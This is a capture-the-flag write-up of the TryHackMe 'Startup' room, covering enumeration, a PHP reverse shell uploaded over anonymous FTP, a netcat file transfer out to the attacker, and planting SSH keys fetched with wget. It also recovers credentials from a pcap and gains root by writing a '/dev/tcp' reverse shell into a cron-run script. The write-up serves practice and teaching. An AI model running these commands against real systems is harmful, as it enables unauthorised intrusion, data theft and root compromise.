THM Startup Link

Startup V1.3 CTF WriteUp

by Zebra

Tasks

Introduction

Hello and welcome to the write-up of the room “Startup” on tryhackme.
Startup is a room marked as easy and in my opinion its also an easy one. After the scanning path we enumerate the ftp and find a way to upload a reverse shell. With access to the system we could find the secret spicy and try to escalate over a user to root. For the escalation we have to analyze a wireshark file to take get some credentials. For escalating from user to root a script in the home system is needed.

So let’s begin:

Preparation Steps

1 2 3 4 5 6 7 8

mkdir startup #New Room folder cd startup #Move into folder mkdir nmap #Nmap directory mkdir gobuster #Gobuster directory sudo nano /etc /hosts #$ip startup.thm export target=10.10.179.244 export golist=/usr/share/seclists/Discovery/Web-Content/common.txt export rockyou=/usr/share/wordlists/rockyou.txt

Scanning and Enumeration

Lets begin with a standard nmap scan for common ports. After that check all ports for don’t let a port pass out of our attention.

Nmap Scan

1. Nmap initial scan
2. Nmap all ports check
3. If necessary fire up a all port scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

nmap -sC -sV -oN ./nmap/initial target.thm
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-10 17:02 CET
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx    2 65534    65534        4096 Nov 09 02:12 ftp [NSE: writeable]
|_-rw-r--r--    1 0        0             208 Nov 09 02:12 notice.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.11.19.12
|      Logged in as ftp
|      TYPE: ASCII
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 42:67:c9:25:f8:04:62:85:4c:00:c0:95:95:62:97:cf (RSA)
|   256 dd:97:11:35:74:2c:dd:e3:c1:75:26:b1:df:eb:a4:82 (ECDSA)
|_  256 27:72:6c:e1:2a:a5:5b:d2:6a:69:ca:f9:b9:82:2c:b9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Maintenance
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

#-sC = Scan with default NSE scripts.
#-sV = Attempts to determine the version of the service running on port.
#-oN = Normal output to the file.

Web Enumeration

Visite web-pages:

Firefox: target.thm

After checking the source code nothing interesting.

Web directory enumeration:

We could use one of our preferred tools like dirbuster, gobuster or dirsearch. I will use dirsearch.

1. Scan:

python3 ~/tools/dirsearch/dirsearch.py -u http://target.thm -e php,html,txt

2. Scan:

python3 ~/tools/dirsearch/dirsearch.py -u http://target.thm/files/ -e php,html,txt

Output:

Check Web directories:

Firefox: target.thm/files

Open: target.thm/files/notice.txt and download with wget http://target.thm/files/notice.txt. Perhaps we need that later.

Hints: Possible username “maya”. Saved to file usernames.txt on local machine

Ftp enumeration

Our nmap scan show an ftp service running on port 21 with anonymous login and writeable access. So check intensively the nmap scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

ftp target.thm

Connected to target.thm.

Name (target.thm:kali): anonymous

Password:
230 Login successful.

ftp> ls

drwxrwxrwx    2 65534    65534        4096 Nov 09 02:12 ftp
-rw-r--r--    1 0        0             208 Nov 09 02:12 notice.txt

ftp> get notice.txt
226 Transfer complete.

ftp> cd ftp
250 Directory successfully changed.

ftp> ls -la
drwxrwxrwx    2 65534    65534        4096 Nov 09 02:12 .
drwxr-xr-x    3 65534    65534        4096 Nov 09 02:12 ..

The possibility to write files into the ftp directory is a great opportunity to get an exploit running.

Lets check pentestmonkey to get a file to upload on the web server.
Download the php reverse shell and change the $ip to $LHOST and the $port to $LPORT.

Exploitation

Rev shell upload

Login to ftp again and upload the rev-shell named shell.php to the server.

1
2
3
4
5
6
7
8
9
10
11

Connected to target.thm.
230 Login successful.

ftp> cd ftp

ftp> put shell.php
local: shell.php remote: shell.php
226 Transfer complete.

ftp> ls
-rwxrwxr-x    1 112      118          5492 Nov 10 16:26 shell.php

Upload sucessfully done. Lets run a netcat listener and trigger the reverse shell.

Listener: nc -lnvp 9001
Firefox: target.thm/files/ftp/shell.php

Bingo! Upgrade: python -c 'import pty;pty.spawn("/bin/bash")',
export SHELL=bash and
export TERM=xterm-256color.

System enumeration

Checkout the actual directory with pwd and have a look at the file we could read, write or execute with ls-la. We find a file name rexxxx.txt. Cat that out and get the answer for task 1.1.

### Task 1.1 solved ###

Next interesting file or directory will be incidents. We find a file named suspicious.pcapng.

Pcapng files are files for wireshark.

Let download this file via netcat:

Local: nc -l -p 1234 > suspicious.pcapng

Target: nc -w 3 $LHOST 1234 < suspicious.pcapng

Check md5sum: md5sum suspicious.pcapng (if it matches you are good, if not do -w 5 on target netcat command)

Wireshark enumeration:

Open wireshark and load the downloaded file.

Mark the first log file and scroll through with the down arrow key. At the bottom of wireshark you see on the left side the output of hex and on the right side parts of stings. So have a look at the string, when your scroll through. After file number 152 we could see that a user name lxxxx are at his home directory at try to open folder or files. He stuck at the point “he had no permissions” and get a command sudo-l. Now we get closer, cause he had to input his password! The string 177 give us the password and we saved it to our local credential file named creds.txt with the echo lxxxx:xxxxxxxxxxx > creds.txt.

Privilege escalation:

Escalate to User:

With our credentials out of wireshark we could change to user of our reverse shell from www-date to lxxxx with su lxxxxx.

Now we escalate to a higher user. At this point I often check first for ssh to get a better connection.

ssh connection for user User:

!!!#Spoileralert# From now on i dont hide the username. !!!

@local:
ssh-keygen name = lennie_rsa, other inputs all check with enter sudo python -m SimpleHTTPServer 4444

@target.thm:
cd #go to home directory mkdir .ssh, cd .ssh wget http://10.11.19.12:4444/lenni_rsa.pub
wget http://10.11.19.12:4444/lenni_rsa
echo "$(cat lenni_rsa.pub)" > authorized_keys

@local chmod +x lennie_rsa ssh -i lennie_rsa lennie@target.thm

@target: shell upgrade.

With the new ssh access we could further enumerate the system.

Cat our the user flag cat /home/lennie/user.txt

### Task 1.2 solved ###

Privilege escalation

Tool upload and runninng

For priv esc i often use the too linpeas and pspy. So lets upload this into temp and run.

Download the tools and upload them via webserver or netcat and set the execute flag with chmod +x.

@target /tmp/

linpeas: ./linpeas.sh | tee lin.og pspy64: ./pspy64

Linpeas output:

With linpeas we find a vulnerable kernel version which could be exploited. So run searchsploit on the version an find the priv esv compiled file. Upload it and ….

FAIL! No gcc on the system. We need another solution.

Start pspy64 and check the processes out.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...

done
2020/11/10 17:12:43 CMD: UID=33   PID=1217   | /usr/sbin/apache2 -k start 
2020/11/10 17:12:43 CMD: UID=33   PID=1215   | /usr/sbin/apache2 -k start 
2020/11/10 17:12:43 CMD: UID=0    PID=1210   | /usr/sbin/apache2 -k start 
2020/11/10 17:12:43 CMD: UID=0    PID=12     | 
2020/11/10 17:12:43 CMD: UID=0    PID=1189   | /sbin/agetty --noclear tty1 linux 
2020/11/10 17:12:43 CMD: UID=0    PID=1183   | /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220 
2020/11/10 17:12:43 CMD: UID=0    PID=11     | 
2020/11/10 17:12:43 CMD: UID=0    PID=1079   | /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog 
2020/11/10 17:12:43 CMD: UID=0    PID=1078   | /usr/lib/policykit-1/polkitd --no-debug 
2020/11/10 17:12:43 CMD: UID=0    PID=1071   | /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal 
2020/11/10 17:12:43 CMD: UID=0    PID=1059   | /usr/sbin/sshd -D 
2020/11/10 17:12:43 CMD: UID=0    PID=1054   | /usr/sbin/vsftpd /etc/vsftpd.conf 
2020/11/10 17:12:43 CMD: UID=0    PID=1031   | /usr/sbin/cron -f 
2020/11/10 17:12:43 CMD: UID=0    PID=1028   | /lib/systemd/systemd-logind 
2020/11/10 17:12:43 CMD: UID=0    PID=1022   | /usr/lib/accountsservice/accounts-daemon 
2020/11/10 17:12:43 CMD: UID=0    PID=10     | 
2020/11/10 17:12:43 CMD: UID=0    PID=1      | /sbin/init 
2020/11/10 17:13:01 CMD: UID=0    PID=2373   | /bin/bash /home/lennie/scripts/planner.sh 
2020/11/10 17:13:01 CMD: UID=0    PID=2372   | /bin/sh -c /home/lennie/scripts/planner.sh 
2020/11/10 17:13:01 CMD: UID=0    PID=2371   | /usr/sbin/CRON -f 
2020/11/10 17:13:01 CMD: UID=0    PID=2374   | /bin/bash /home/lennie/scripts/planner.sh 
2020/11/10 17:15:01 CMD: UID=0    PID=2382   | 
2020/11/10 17:15:01 CMD: UID=0    PID=2381   | /bin/bash /home/lennie/scripts/planner.sh 
2020/11/10 17:15:01 CMD: UID=0    PID=2380   | /bin/sh -c /home/lennie/scripts/planner.sh 
2020/11/10 17:15:01 CMD: UID=0    PID=2379   | /usr/sbin/CRON -f 

We could see an interesting process with runs /bin/bash /home/lennie/scripts/planner.sh out of our home directory.

Escalate to root:

First got to the directory called /home/lennie/scripts/ and look at the permissions.

1
2
3
4
5
6
7

ls -la /home/lennie/scripts/
total 16
drwxr-xr-x 2 root   root   4096 Nov  9 02:13 .
drwx------ 6 lennie lennie 4096 Nov 10 16:56 ..
-rwxr-xr-x 1 root   root     77 Nov  9 02:12 planner.sh
-rw-r--r-- 1 root   root      1 Nov 10 17:19 startup_list.txt

We see that we only could read the file. Do this.

1
2
3
4

lennie@startup:~/scripts$ cat planner.sh 
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh

-> The planner.sh execute another file called print.sh. Check that out

We are owner of this file so we could change the content and could upload an exploit. Do this with nano /etc/print.sh and upload a rev shell bash command out of pentestmokey.

bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1

@local:
Start a netcat listener on port 9001 and wait.
nc -lnvp 9001.

BOOOM! Root.

cat /root/root.txt

### Task 1.3 solved ###

What we learned:

1. Web enumeration with dirsearch
2. ftp enumeration with ftp and exploit with write permissions
3. Analyze wireshark files
4. Use pspy and exploit by scheduled scripts.